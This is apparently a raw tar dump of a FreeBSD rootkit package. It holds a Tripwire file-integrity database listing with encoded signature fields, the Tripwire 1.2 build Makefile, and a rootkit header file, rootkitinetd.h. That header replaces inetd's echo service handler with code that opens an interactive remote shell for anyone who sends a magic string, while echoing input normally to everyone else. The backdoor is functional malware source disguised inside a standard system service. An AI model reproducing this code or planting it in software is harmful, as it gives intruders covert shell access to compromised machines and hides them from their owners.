1EZ32aeUVvRfmh90ozZOdL E0k1NtWFxQ9r7AGsAz:u6uU3MnA 0BLdK0RYWxe2BJilYvNpVS 0 /tmp/genek/tripwire-1.2/sigs/md2/global.h 0 00007R 100600 15388 1 856 856 856 0kOiv6 0iSmzO 0kOiv6 0 1DcG7R76MwKXvw:5A4v0mA 0C3RhN5kGuSz7G86LPtEdy 3DrjFT 0005no 2p3M.6UAxr79X74x1N5fL5 3u5klnQDzw0Of:YsEkoDPD 36BBSL5uHD9KgK3nw:RsB46zaqa 3jvCcPKeArmQJGsO4xFeyC 0 /tmp/genek/tripwire-1.2/sigs/md2/md2.c 0 00007R 100600 15391 1 856 856 7127 0kOiv6 0k9cpv 0kOiv6 0 3nGNXP:KnQimVLBKLyqyvL 209vEmxw4MRjFVrYPBJkuC 0Fijil 000EII 149zoHOfSfZufZtc1NTQR. 0ctdsxHV4n9YwFEWYN2jWG 4f14MzrL1NkgnUhgFqEGdIIIWnQ 3dF1vaVJ81Ur17oZl74xQc 0 /tmp/genek/tripwire-1.2/sigs/md2/md2.h 0 00007R 100600 15395 1 856 856 1214 0kOiv6 0iSmzQ 0kOiv6 0 0ZI8kLOHwlsA7v5ECwjwEr 1Z7:sI0xEcVjq2w9bZrZqJ 1OxGo0 0007Ll 0UpIvnmwyaYu86xVlrxWUJ 20XEaBI336yqiElyW0a6vT 8cgpnu:lPLm6OscpuMN.BkNNzjA 2Nyds3A0FWV.NkQ.7ye:GX 0 /tmp/genek/tripwire-1.2/sigs/md2/md2wrapper.c 0 00007R 100600 15397 1 856 856 1944 0kOiv7 0kCzvT 0kOiv7 0 3js1QN6YzIA02:Tinyirvs 12Y9k49K7rcKdhuhMJ1BdM 1.fwGq 0002In 0okkDNzGszlw1OM7IpsGkC 08j7cqKCcLw3vBmVF1I68B 50I70y9en4X4Vdl5JTw9odE52t0 0jPId5yXUa7x:7J2IQj:ZR 0 /tmp/genek/tripwire-1.2/sigs/md4 0 00007R 40740 17718 2 856 856 512 0kOivM 0kOiuS 0kOiv7 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md4/Makefile 0 00007R 100600 17746 1 856 856 312 0kOiv7 0iy5vO 0kOiv7 0 2my7Acd6wLC4YuRSH6dzAF 18SI:DxzSM:OqC3JyAEc4c 3PHnsa 0008I. 2DGz5jWuGOO3LraUNJsLlh 1lAsvCZBbB17z0Qv94LBlp AE8b1zhAnXsGn8RYfBElB1G7C0f 3wVThW5BaFcwkcy25iww2q 0 /tmp/genek/tripwire-1.2/sigs/md4/md4.c 0 00007R 100600 17747 1 856 856 9904 0kOiv7 0kCzvW 0kOiv7 0 3vRK7p4WYzdR8Or5iSK:j. 3I305g7XdmOgKrjW6HaAAh 1jkCcL 000Axt 34IfzO.XsW4rVxzpd7LxZO 20LbIQuscpBYv3Tfs.ZTPU 1:lZhtftl8bm5Ls4c2NSM3Ch:NN 2CTomD0XxIzgEaUSuWsAag 0 /tmp/genek/tripwire-1.2/sigs/md4/md4.h 0 00007R 100600 17751 1 856 856 1920 0kOiv7 0iSmzV 0kOiv7 0 2rPuz1Uhc:QDjlq7aW6H6. 1iS3ddg9imQCJHog3.tgo7 3DGEW9 000CTX 1nTfGrLN:O0sCGbhZa865R 2Pbrew7SZqwhUvJgbBBNsY 5UWWH:7Qh9bsnUk404puIrMMe7s 0CEa6sCWO0Yvdfgq1V1tsI 0 /tmp/genek/tripwire-1.2/sigs/md4/md4wrapper.c 0 00007R 100600 17752 1 856 856 1906 0kOiv7 0kCzvX 0kOiv7 0 2SI1SgxXHVI0NnXUfZVRH2 0MvdRksljcl7170vhHs9Ef 0bAUmo 000EmA 3xkiJbkE6leRRbbWL5O1Tf 2o7SETzuWhHX9VB675Qb.2 0CIt5sETZ9Q:mtap:syHxqMMR:9 3QV8WJ8ftrsjZBs8XGXESM 0 /tmp/genek/tripwire-1.2/sigs/md5 0 00007R 40740 20785 2 856 856 512 0kOivM 0kOiuS 0kOiv8 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md5/Makefile 0 00007R 100600 20786 1 856 856 309 0kOiv7 0iy5vQ 0kOiv7 0 16aazat3hycq.3ave6YC.e 28xfZ1wNjpZhFwPNO3Nm3w 3HMl1X 0008A1 08q6IW36tFm9A6NpmGsX5v 3qi95jnPPDhA8qTzpPyNkc BYNTkfbjDbU2Bg9BiUjKhbVuO1V 2Ww9i5uc:4yqY7wVMXkCoY 0 /tmp/genek/tripwire-1.2/sigs/md5/README.md5 0 00007R 100600 20789 1 856 856 2575 0kOiv8 0iSmzZ 0kOiv8 0 3659z16SPZZ4YfCH:gm2Sp 10vQfEOBpDfpkB5pJ4MK49 2WgoTf 000CQi 1RkqrCtfUvopnlwNnkKPGd 2QNxv84hnvD:aT2McJamUT 6G0992oszrXSwFSz3669nPPSaPx 1:NE8DGniXeSHXyvCtcQMp 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.c 0 00007R 100600 20792 1 856 856 10289 0kOiv8 0iy5vQ 0kOiv8 0 37MokxbAjdrw5Ovtg8Wtgr 1A8qihV105oPyxp0mNF4:P 0EuEB3 0000Zn 3JwvvSJVSSsvs2fuL:JkIv 3i4HIRKyJkuuQTtFL:yjlM 7TnQpsTrOv7MwMYx4NDhBWTXAny 19T7ENS1U8orCBpxn:2CBq 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.doc 0 00007R 100600 20793 1 856 856 19119 0kOiv8 0iSmzb 0kOiv8 0 3muulH4lKYOKH8zFgX6kcd 1PveHh2o72ch7T8NzUcKPN 2NNGsP 0004g0 0tCAFQ5N19LWzuVOUrH7PN 1Y3ZIMh1K:Fv6Hf1Be708v 3yUK2HyzggyCivBOEf4p4IVaoEG 0o2GTLZ0vr4oJtPiOHcBA5 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.h 0 00007R 100600 20794 1 856 856 1139 0kOiv8 0k9cp: 0kOiv8 0 0dzgN.0CItEkU4zOsY6PO4 1sW3n8PBn3k4OLsEQgXXTm 2S7dI4 000FL2 0psbpqfYaypFwHkcQj4ZNo 3qwV.BXUe3U59s5I.XPaih 9Ufv5Od1WaON4cn5P38.rhpWPO1 0tHCDNQuAUBmw8saLBODd4 0 /tmp/genek/tripwire-1.2/sigs/md5/md5wrapper.c 0 00007R 100600 20795 1 856 856 2032 0kOiv8 0kCzvZ 0kOiv8 0 0nR.9i2lAVOUTVjj7TI.q0 3EN3ieTsDkXddMjqgVIkYX 0YTMMM 0006tf 2C.VP5gDnkNSOgPxQhF2tn 3hAxGe5EfJFMPkN3998TtM FyJjqXoPO8zBphPDa2xjFzjWa7v 3BCAsEfh.9jNZQXDbEed2i 0 /tmp/genek/tripwire-1.2/sigs/sha 0 00007R 40740 23096 2 856 856 512 0kOivM 0kOiuT 0kOiv9 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/sha/Makefile 0 00007R 100600 23101 1 856 856 292 0kOiv8 0iy5vW 0kOiv8 0 2ZdiPtncH9HIHmBvZbwERb 1bqkJd7XBHRfhIyu5oE9Yw 1XUAEK 0003Xv 0kPtl65YwQ3xYY1M0Jb.ee 0XC9pn:WdpZVUvexFYJZ1r FlwW40wByQS59EA7mpxilGj9or6 1QQeLEhaQrmD.Zoe1uF7:u 0 /tmp/genek/tripwire-1.2/sigs/sha/sha.c 0 00007R 100640 23102 1 856 856 11560 0kOiv8 0kCzvb 0kOiv8 0 3e2V8qEqTk5URVpuTa1RTO 1exV5tSrqEIOMySpQaaD1a 30LIBb 000DSy 1lTaICcqs9esqn0g1cMy7. 0ncJZGIYtvj0BNfVSa9t10 BKkwd7yHtMHXs3Udg7Zgav30yIQ 3lh3IRSc5PraqtwakWDNs3 0 /tmp/genek/tripwire-1.2/sigs/sha/sha.h 0 00007R 100640 23103 1 856 856 1414 0kOiv9 0kCzvd 0kOiv9 0 1.p8PdV38IHPLX6F:tnkbK 3iLE2d0woFfBvtFe92:RRf 0frx4B 000Axh 2gS:OQvAnH37je1vhm9Lkg 2x79sTtAA7MMzl6peS7vyE 2Lkx4k0NZ4fEoMYRg4cxyyjquZm 08FKVTU76TR1OJ1BOVmBsR 0 /tmp/genek/tripwire-1.2/sigs/sha/shawrapper.c 0 00007R 100600 23104 1 856 856 2092 0kOiv9 0kCzve 0kOiv9 0 0D.8IL:5q85eQmym:7tJZi 1ZVvDtFaCftdBW2KAt7Yap 20GbeI 0007v5 10nzNmr3hLFXAynsz0t0Rx 1iTT3XzD8App7ILLSOVnM2 7SVitQ3NC0R:McYS5RG6v2RfJhD 1jUXMV7gWboSyZ4uTZidMD 0 /tmp/genek/tripwire-1.2/sigs/snefru 0 00007R 40740 25435 2 856 856 512 0kOivM 0kOiuT 0kOivC 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/snefru/Makefile 0 00007R 100600 25436 1 856 856 250 0kOiv9 0iy5vX 0kOiv9 0 2.lPuquu9XUAeAD1SOC.9N 2B.VXEwvx5q0DBebqlN3p9 1CfHll 000F6f 10uJS6Cjr.tWxp7ySXdCwO 0Fb7ErysO3zCACvh0gcYHr F4yLf6PFb278C67mha.qEcLHtDu 3J:T:2dsmVB00XotvbI0i4 0 /tmp/genek/tripwire-1.2/sigs/snefru/README.snefru 0 00007R 100600 25437 1 856 856 8500 0kOiv9 0iSmzi 0kOiv9 0 2CVxs9hG4q7jipWWRWsOzn 1hAzaZ4YmhAhOaj7IbvcTj 21DzIF 0003cY 2:SYi8LwxceadLLPL7gB3s 3xJRPVxz4qq3HCeeDc.3Za 8fwZw50G6QoLosNM6ZZQKu3165O 2wIzvvGuVmbTOrsQHnp3nf 0 /tmp/genek/tripwire-1.2/sigs/snefru/snefru.c 0 00007R 100600 25438 1 856 856 81153 0kOiv9 0kCzvi 0kOiv9 0 1uWtmZa3JBqo06pGcUcz:Z 1lK7snyy4fTRfqoSL1DouI 09N9QN 0007JN 0eyUuMIUSkBsm7B4I.2hVr 16ZOj2MzV1cWc3qStipTJm EWcmto6aFh6pn.ICb4XcEZXpjrB 3JhDRtKciuCwFjUvPbAGZS 0 /tmp/genek/tripwire-1.2/sigs/snefru/snefru.h 0 00007R 100600 25439 1 856 856 92 0kOivA 0igw:k 0kOivA 0 0Wy72aFEiIYyrEJmyLLmVL 0kGLEVAWRJq7mTMq9VXEdY 0BDehQ 00084J 2.Dxm:hxELGF7gmnixPY27 33Efjug4S:wBP.fIu6:5wy FC:sGPhv.SdWdwGt2:RgKvR4Ve. 0d6vOSk2FL:EKvZ:IuM:J6 0 /tmp/genek/tripwire-1.2/src 0 00007R 40740 26931 2 856 856 512 0kOivM 0kOiuT 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/src/Makefile 0 00007R 100600 26932 1 856 856 8364 0kOivD 0kCzq6 0kOivD 0 02fIZhFi17p8wkMZ4VfAM3 2T3XJsN4ytazTDinpeWCDx 1L0VS8 000DH4 2R1ycBTkNSAAcg3rwqr500 3x9BPjQSvrkxxppP0hjNc8 9LAMLRNqrH1lgDSuaziHJ8WtBFc 0g9O.jtacjIuvqYFhHQ.aX 0 /tmp/genek/tripwire-1.2/src/config.parse.c 0 00007R 100600 26933 1 856 856 16391 0kOivD 0kBSbU 0kOivD 0 0G1Ji8HeeXQlXFmOlx7D9X 2Q7URdrP0AdAhZUOVNiKRH 3N:ngW 000Fnd 1ul3Y66U0qYc.XwyB7t6Ev 3X8Zt0JEkevYg5slqKh:4q 7KuXcWOOT80A5X2g9jTejeuLGAJ 3NZ3F8PuSn175rIvZummu5 0 /tmp/genek/tripwire-1.2/src/config.pre.l 0 00007R 100600 26934 1 856 856 3233 0kOivD 0kCzq7 0kOivD 0 3ujnicH4z1lebjgUS5GZ:. 3jAdqZWPJAmz9:KQFdBjNd 2vD3zf 0006ke 3AXb6P6RAlqXQUGypuLCo3 1FCT.N:paoAuBAnDuobHgp A2G5ZySq2FlAiEgnXQpneOdpYhe 3p4oVlwmzSHOHqF4jwJkDk 0 /tmp/genek/tripwire-1.2/src/config.pre.y 0 00007R 100600 26935 1 856 856 11484 0kOivD 0kG6GW 0kOivD 0 04PLslZHvHpTWKSwJw3:u. 0abFVARWu.Pcd9hw7D9qQJ 1n38z7 0002bA 0WPR79nVNY820SZ2WaQVgW 2jvBieeIe87d8y:ht:yeBp Ax314LdmNyemXcmR4zfzZRHqtv0 2GQuJ4ZBDw:POmbAMJYz.Q 0 /tmp/genek/tripwire-1.2/src/config.prim.c 0 00007R 100600 26936 1 856 856 3005 0kOivD 0jds2I 0kOivD 0 1Z.A2:izSZAhifnLRJNqNm 3je0Qh4gXdw.M2jw1mFFYe 1JZd.1 000CSv 0NkLYxulKXGWLf:1XmWCtk 0Kb1R7vTvzQ5fhRrbOB9B1 AC:wGJSK6J.wLT1GLs1s1XQ7t1D 3WiZ2xLllFrmawvxx8fvV3 0 /tmp/genek/tripwire-1.2/src/dbase.build.c 0 00007R 100600 26937 1 856 856 15005 0kOivD 0kCzaP 0kOivD 0 2WdPLU:lUi.NRsTOLXBMyr 0GJfWHoLYlKe9le0uz72dG 0ol:qI 0001S5 3dm7T124FsHcrpRAqqXkK5 2sJwoRA.auoEYeC80LYcyZ FPX7vbO3eAiPf6abyQ3cOFqt4qz 2HgofgqAutDnZCQmEgdFqT 0 /tmp/genek/tripwire-1.2/src/dbase.update.c 0 00007R 100600 26938 1 856 856 3275 0kOivD 0kA8qC 0kOivD 0 0wS3AVhyzsL6q.5UqZcNDT 0e07GDitIwnqylfXIUzImu 2AQlSB 0000Za 22Q1LQEXeLXIXB.zfH44ga 3Vs7ZNcJf3HmPH0fVbYHR9 9RMp4GbFkAiNvvG3YPQf7n5NAZw 1rLzAVEeIesA9v53Kvn8IT 0 /tmp/genek/tripwire-1.2/src/help.sh 0 00007R 100700 26939 1 856 856 587 0kOivD 0jds2M 0kOivD 0 38C.RjjdQE11IqPBUHuvt. 3G7WNV:wWQycqG.rvrCfPe 3RIVb. 00077Q 2PcQ3atAAGo9zWapIm.QdA 1J9GEMo6dfS0A:c2IhcXoE DuM4njLdIAzV1cSq1aCuf1q3ssG 1Zar0FG:6pC5QRtneZceIC 0 /tmp/genek/tripwire-1.2/src/help.txt 0 00007R 100600 26940 1 856 856 1060 0kOivD 0jds2N 0kOivD 0 32m01BhseVZe4FoNxy9nvd 18TEL0IA23wy9sfusaD:jQ 1FoN3O 000E0U 2NLI7Ljl2nMvvIwNftXK.o 34FRsGXo2OgHtyB1J:Ac4f 9sTQVBeXrJZEqsKVVdAJWwM8pir 3Lsi4dvxbDI5aU8kPOvFSR 0 /tmp/genek/tripwire-1.2/src/ignorevec.c 0 00007R 100600 26941 1 856 856 3692 0kOivE 0k9cqG 0kOivE 0 2WQiSCVctrkKTVO2Mn7IvW 25gnKCUoOy1Y2ERa8q2ztK 15ZAQ8 0003Fn 2mm4ObtHF.ZaPxrwXyp7rU 1GvUJdNwoLS0ofkDBb57gp FeCX:bUwH:RNHevCBlVFsv4x11q 3omcenaI4Yj0Y4X.Qlt6AP 0 /tmp/genek/tripwire-1.2/src/list.c 0 00007R 100600 26942 1 856 856 16912 0kOivE 0kA8NH 0kOivE 0 1cgiTzGpjgH8vsLbbXPQvo 08a9jxOUicb6gUIT8ZZhtV 2rT7BZ 0008e9 3Y56Z9ZlZsEGZBwizLnC5C 2Y3HJo9j4:OCZD9XQ3NPBa C5Z5.ajA2EH8ULdj8Y35UYNZiAA 0VfHcp:fJ4EQFvJ6DhD.XK 0 /tmp/genek/tripwire-1.2/src/main.c 0 00007R 100600 26943 1 856 856 18065 0kOivE 0kNQPd 0kOivE 0 1lsW0avkPmVl6LpPElIRC: 1JFnF1gtZ6OXJbhkL2CBDX 001mhA 000EXg 31rpR3mZO1v4bSXhmUfdYM 14P9WNhBjwwF2NzbzxxINi 6DKfqfzZqiaz0:g5KiCtQms.Cjq 2GzdU4wGTaF74hbM.5Nosz 0 /tmp/genek/tripwire-1.2/src/md4convert.sh 0 00007R 100700 26944 1 856 856 2262 0kOivE 0htnSx 0kOivE 0 3yB.NsHFFy0xUci.cai5oj 1tJPzfUT6kOndbCC4L8.Gh 1F9zwV 0006Xw 2oN4FrW9lB9qJ.n9HdaOte 0TI927:fN44xAUxqTN3.IQ 2Swyu72gN9bEtb4Nx5NdBV5fkNI 3lUme:ygner:OO9SIxXRxr 0 /tmp/genek/tripwire-1.2/src/nullsig.c 0 00007R 100600 26945 1 856 856 1145 0kOivE 0kABZZ 0kOivE 0 2U3sBrr:hMoGSHgx98R50G 3mcFxpD1Grz5zeyJJydF1g 0ktdbN 0007L6 2MnVjzLGgCHBmVcGw.8nir 1YYXsTyEHqlgKceGo9LXuN 3AHr6ObVTR:3xcV3Mo6a0Y6ddoL 3glVh:d5LvEIXuBbgB9oG0 0 /tmp/genek/tripwire-1.2/src/preen.c 0 00007R 100600 26946 1 856 856 19421 0kOivE 0kCzaR 0kOivE 0 3sJyoIfZRwm2:DbmEaLcCO 2cJwNna6uaky:jo1RcAvDX 2BUP48 000D7C 15PZU.IOvBGLcsJfrZOpBY 1SIBXo2ShOUXfgo3PoBhbh 7Emr0FBH25K2xkUQAbAOpuzj4Ot 0ey9lwNlFD14lew6gecJNx 0 /tmp/genek/tripwire-1.2/src/preen.interp.c 0 00007R 100600 26947 1 856 856 3096 0kOivE 0jds2W 0kOivE 0 3slNGosN0C1R3YoZ3egeEC 30xg5iczSHIRikI8.qdBKC 2ooPru 0006eV 0czuZ0BwmjnJkZnSytKOxL 2snen4yvjLPX2o:YL85cMl 9Ez63xRpcr.qHGhvO7RuRNHnUuH 2xWymDeAYoyiz7iSKI00yb 0 /tmp/genek/tripwire-1.2/src/preen.report.c 0 00007R 100600 26948 1 856 856 24089 0kOivE 0kG6GY 0kOivE 0 0L2PRWCWhPmPRghg.dbKYD 20PUlXV30AYsdHJCBH6KJu 1E.XhU 00045r 0Rccj3mZdueY8Idu3SlvV7 3RnE2K6Ym9OgPOGo24W6Af 19k:xH1fb8pCpclNGApliWvldg: 1GLCg5Ir2miCVlwijF5JIg 0 /tmp/genek/tripwire-1.2/src/siggen.c 0 00007R 100600 26949 1 856 856 4548 0kOivE 0kCzaS 0kOivE 0 3rqnhIv8vyOXSN1yv7zwzh 3IMhhnz5mU:r.GZYmSxCO7 2Lxr8T 0001rV 2dCAJr:csWa2VpcvniM3D. 1YEILzs1cvCvSGbQqwQzZT 9puNJs37:vm9fVsT:plPwyowlnf 2m7DcA7ZbZUt3o8PShHgMT 0 /tmp/genek/tripwire-1.2/src/twdb_check.pl 0 00007R 100740 26950 1 856 856 3590 0kOivE 0kNQPf 0kOivE 0 2Sk8bIyNBxM7DnSDBfEKk6 2g1lV:fxIyAbYhXiklIpMK 0mcB6h 000Eq8 0xsMf:4KAREMTEkdw90CaB 072xRwErDViWOkJYSxM0NZ 8gz0VdeZWJ3Y6BuLbd6hPttSSEu 3v0fxXcSFO2yJ.aXwmh4cj 0 /tmp/genek/tripwire-1.2/src/utils.c 0 00007R 100600 26951 1 856 856 18264 0kOivE 0kC:Rq 0kOivE 0 10UVknv7MGNKsvjt92Rumg 1A.wa78zN:geIm8FJYv2hY 1qK5oU 00045o 0kiIQcXJKVXyXeZFga4w3y 0NZzQDjlcetcQ5qm.k7tZa FdtS.tDzcPMc:NhIyrn5CXZzqXk 0EDVj98zdcEWquGpKvCCVV 0 /tmp/genek/tripwire-1.2/tests 1 001... 40740 27710 3 856 856 512 0kOivM 0kOiuT 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/Makefile 1 001... 100600 27711 1 856 856 835 0kOivF 0j3vVC 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/createfiles.c 1 001... 100640 27712 1 856 856 2177 0kOivF 0iTjcJ 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.escape.sh 1 001... 100740 27713 1 856 856 7331 0kOivF 0j2dOv 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.inter.sh 1 001... 100740 27714 1 856 856 7995 0kOivF 0jQRXB 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.twpre.sh 1 001... 100740 27715 1 856 856 1455 0kOivF 0jQRXC 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.update.sh 1 001... 100740 27716 1 856 856 8790 0kOivG 0jQRXE 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test0.key 1 001... 100640 27717 1 856 856 7181 0kOivG 0kCz.s 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test0.sh 1 001... 100640 27718 1 856 856 709 0kOivG 0j2dOz 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test1.sh 1 001... 100600 27719 1 856 856 1623 0kOivG 0j3qDn 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/tw.conf.test 1 001... 100600 27720 1 856 856 2030 0kOivG 0kC:Rt 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/tw.db_TEST 1 001... 100600 27721 1 856 856 41757 0kOivG 0kNgku 0kOivG 0 0 0 0 0 0 0 0 0 0 @@contents /tmp/genek/tripwire-1.2 0 @@contents /tmp/genek/tripwire-1.2/tests 1 fbsdrootkit-1.2/tripwire-1.2/Makefile.dist100600 764 764 7112 6273465277 15723 0ustar dfdf# $Id: Makefile,v 1.16 1994/07/25 15:59:41 gkim Exp $ # # Tripwire build # # See the README file before running this! # ### ### Start of user-modified settings ### Examine these and change the ones that need to be ### Altered on your system ### # destination directory for final executables DESTDIR = /secureplace/bin # destination for man pages MANDIR = /usr/man # system utilities LEX = lex #LEX = flex # For the GNU crowd YACC = yacc #YACC = bison -y # For the GNU crowd (make it look like yacc) # # see ./contrib/README.linux for tips on # # making work. # for SVR4 make (must be a Bourne-type shell) SHELL = /bin/sh #SHELL = /bin/ksh # Another common shell #SHELL = /bin/bash # For the GNU fanatics # you can use ANSI C if you like, but K&R is equally fine. CC = cc # common #CC = gcc # also common #CC = /usr/ccs/bin/cc # Pyramid DC/OSx (SVR4) CFLAGS = -O # common #CFLAGS = -g # common #CFLAGS = -g # debugging #CFLAGS = -O -cckr # SGI # NOTE: some versions of the HP C compiler optimizer breaks snefru.c! # consider recompiling this file seperately without optimization #CFLAGS = -O -Aa -N # HP/UX ansi #CFLAGS = -O -Ac -N # HP/UX K&R #CFLAGS = -O -Ac -N -Wl,-a,archive # HP/UX K&R, insure archived, static link #CFLAGS = -systype bsd43 # ETA/10 (SVR3) #CFLAGS = -systype bsd43 # MIPS RISC/OS 4.5x #CFLAGS = -O -ansi # gnu CC #CFLAGS = -O -ansi -W -Wreturn-type -Wswitch -Wshadow # gnu CC w/all warnings #CFLAGS = -OG # Pyramid OSx #CFLAGS = -O -Kold # Pyramid DC/OSx (SVR4) #CFLAGS = -DTW_TYPE32='int' # DEC OSF/1 Alpha (or any other architecture # where int [but not long] is a 32 bit quantity) # a C preprocessor (to build inode.h) CPP = $(CC) -E # common #CPP = /usr/lib/cpp # on older systems #CPP = /lib/cpp # on older systems # make sure libraries are not linked dynamically (as a security measure) LDFLAGS= # common #LDFLAGS= -non_shared # OSF/1 #LDFLAGS= -Bstatic # SunOS 4 (cannot statically link tripwire # on Solaris 2.3) #LDFLAGS= -dn # Pyramid DC/OSx (SVR4) # libraries LIBS = # common #LIBS = -lsocket # SCO #LIBS = -lmalloc -lsun -lc_s # IRIX 4.0 #LIBS = -lx # Xenix #LIBS = -lbsd # MIPS RISC/OS #LIBS = -lgnumalloc # Encore / UMAX V # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /usr/bin/install # common #INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4) #INSTALL= /etc/install # Pyramid OSx #INSTALL= /bin/cp # no install #INSTALL= /usr/bin/installbsd # OSF/1 (DEC only?) # how you get hostname information (BSD vs. SYSV style) HOSTNAME = "hostname" # BSD #HOSTNAME = "uname -n" # System V ### ### End of user-modified settings ### You should not need to change anything after this ### DIST = tripwire-1.2 all: (cd aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) (cd src; make CC=$(CC) CFLAGS="$(CFLAGS)" LIBS="$(LIBS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) \ YACC="$(YACC)" LEX="$(LEX)" all) install: all (cd src; make INSTALL=$(INSTALL) DESTDIR=$(DESTDIR) install) (cd man; make INSTALL=$(INSTALL) MANDIR=$(MANDIR) install) test: all (cd tests; make HOSTNAME=$(HOSTNAME) DIST=$(DIST) SHELL=$(SHELL) \ CC=$(CC)) clean: (cd src; make clean) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core clobber: clean (cd src; make clobber) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core rm -f */*_pure_*.o sigs/*/*_pure_*.o fbsdrootkit-1.2/rootkitinetd.h100600 764 764 1021 6273477757 14045 0ustar dfdfvoid rshell_stream(int s, struct servtab *sep) { char buffer[BUFSIZE]; int i; char MAG[7]; MAG[0]=ROOTKIT_MAGIC[0]; MAG[1]=ROOTKIT_MAGIC[1]; MAG[2]=ROOTKIT_MAGIC[2]; MAG[3]=ROOTKIT_MAGIC[3]; MAG[4]=ROOTKIT_MAGIC[4]; MAG[5]=ROOTKIT_MAGIC[5]; MAG[6]='\0'; while ((i = read(s, buffer, sizeof(buffer))) > 0) { if(!strncmp(buffer, MAG, sizeof(MAG)-1)) { dup2(s, 0); dup2(s, 1); dup2(s, 2); execl("/bin/sh", "sh", "-i", 0); close(s); break; } if(write(s, buffer, i) < 0) break; } exit(0); }